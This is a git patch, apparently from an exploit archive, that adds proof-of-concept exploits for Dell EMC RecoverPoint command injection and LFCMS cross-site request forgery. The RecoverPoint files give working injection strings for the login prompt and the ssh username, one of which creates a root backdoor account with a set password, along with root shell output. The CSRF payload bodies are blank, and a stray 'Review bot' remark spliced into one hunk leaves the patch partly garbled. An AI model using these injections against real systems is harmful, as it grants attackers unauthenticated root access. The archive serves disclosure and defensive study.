From 11ecb9c0316af9eb163d8d0ebf6573ca95d08fe1 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 22 Jun 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-06-22 4 changes to exploits/shellcodes
Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution
Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution
VideoInsight WebClient 5 - SQL Injection
LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)
LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)
---
 exploits/linux/local/44920.txt | 23 +++++++++++++++++++++++
 exploits/linux/remote/44921.txt | 28 ++++++++++++++++++++++++++++
 exploits/php/webapps/44918.html | 27 +++++++++++++++++++++++++++
 exploits/php/webapps/44919.html | 26 ++++++++++++++++++++++++++
 files_exploits.csv | 6 +++++-
 5 files changed, 109 insertions(+), 1 deletion(-)
 create mode 100644 exploits/linux/local/44920.txt
 create mode 100644 exploits/linux/remote/44921.txt
 create mode 100644 exploits/php/webapps/44918.html
 create mode 100644 exploits/php/webapps/44919.html
diff --git a/exploits/linux/local/44920.txt b/exploits/linux/local/44920.txt
new file mode 100644
index 000000000..5603e3e2f
--- /dev/null
+++ b/exploits/linux/local/44920.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution
+# Date: 2018-06-21
+# Exploit Author: Paul Taylor
+# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
+# Vendor Advisory: DSA-2018-095
+# Vendor KB: https://support.emc.com/kb/521234
+# Github: https://github.com/bao7uo/dell-emc_recoverpoint
+# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
+# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
+# CVE: CVE-2018-1235
+
+# 1. Description
+# An OS command injection vulnerability exists in the mechanism which processes usernames
+# which are presented for authentication, allowing unauthenticated root access
+# via tty console login.
+
+# 2. Proof of Concept
+# Inject into local tty console login prompt
+
+recoverpoint login: $(bash > &2)
+root@recoverpoint:/# id
+uid=0(root) gid=0(root) groups=0(root)
+root@recoverpoint:/#
\ No newline at end of file
diff --git a/exploits/linux/remote/44921.txt b/exploits/linux/remote/44921.txt
new file mode 100644
index 000000000..cbbf1c6c5
--- /dev/null
+++ b/exploits/linux/remote/44921.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution
+# Date: 2018-06-21
+# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
+# Exploit Author: Paul Taylor
+# Vendor Advisory: DSA-2018-095
+# Vendor KB: https://support.emc.com/kb/521234
+# Github: https://github.com/bao7uo/dell-emc_recoverpoint
+# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
+# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
+# CVE: CVE-2018-1235
+
+# 1. Description
+# An OS command injection vulnerability exists in the mechanism which processes usernames
+# which are presented for authentication, allowing unauthenticated root access via
+# the ssh service.
+
+# 2. Proof of Concept
+# Inject into ssh username.
+# N.B. combined length of new username+password is limited to 21 due to injection length limitations
+
+$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3
+Password: ^C
+$ ssh bao7uo@192.168.57.3
+Password: Secret123
+Could not chdir to home directory /home/bao7uo: No such file or directory
+root@recoverpoint:/# id
+uid=0(root) gid=0(root) groups=0(root)
+root@recoverpoint:/#
\ No newline at end of file
diff --git a/exploits/php/webapps/44918.html b/exploits/php/webapps/44918.html
new file mode 100644
index 000000000..7b365c248
--- /dev/null
+++ b/exploits/php/webapps/44918.html
@@ -0,0 +1,27 @@
+# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
+# Date: 2018-06-20
+# Exploit Author: bay0net
+# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
+# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
+# Version: 3.7.0
+# CVE : CVE-2018-12602
+
+
+A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
+
+
+The payload for attack is as follows.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44919.html b/exploits/php/webapps/44919.html
new file mode 100644
index 000000000..7ecfdb74d
--- /dev/null
+++ b/exploits/php/webapps/44919.html
@@ -0,0 +1,26 @@
+# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.
+# Date: 2018-06-20
+# Exploit Author: bay0net
+# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203899.html
+# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
+# Version: 3.7.0
+# CVE : CVE-2018-12603
+
+
+A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.
+
+
+The payload for attack is as follows.
+
+
+
+
+
+
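Review bot: The metadata header at the top of 44918.html (`# Exploit Title …` through `# CVE : CVE-2018-12602`) uses `#` line comments, which HTML does not recognise, so a browser renders those lines as visible text rather than treating them as a comment; 44919.html carries the same header. Wrapping that block in a single `<!-- … -->` comment keeps the metadata in the file without it appearing in the rendered page. The form markup that the text refers to is not visible in this view of the hunk, so nothing else in the body can be checked here.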
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 62bcd424e..b74cfdfae 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9791,6 +9791,7 @@ id,file,description,date,author,type,platform,port
 44903,exploits/windows/local/44903.py,"Audiograbber 1.83 - Local Buffer Overflow (SEH)",2018-06-18,"Dennis 'dhn' Herrmann",local,windows,
 44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux,
 44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
+44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16579,6 +16580,7 @@ id,file,description,date,author,type,platform,port
 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux,
+44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39571,4 +39573,6 @@ id,file,description,date,author,type,platform,port
 44912,exploits/hardware/webapps/44912.py,"TP-Link TL-WA850RE - Remote Command Execution",2018-06-20,yoresongo,webapps,hardware,
 44913,exploits/linux/webapps/44913.py,"Apache CouchDB < 2.1.0 - Remote Code Execution",2018-06-20,"Cody Zacharias",webapps,linux,
 44916,exploits/multiple/webapps/44916.rb,"IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)",2018-06-20,Nettitude,webapps,multiple,80
-44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,
+44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,80
+44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80
+44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80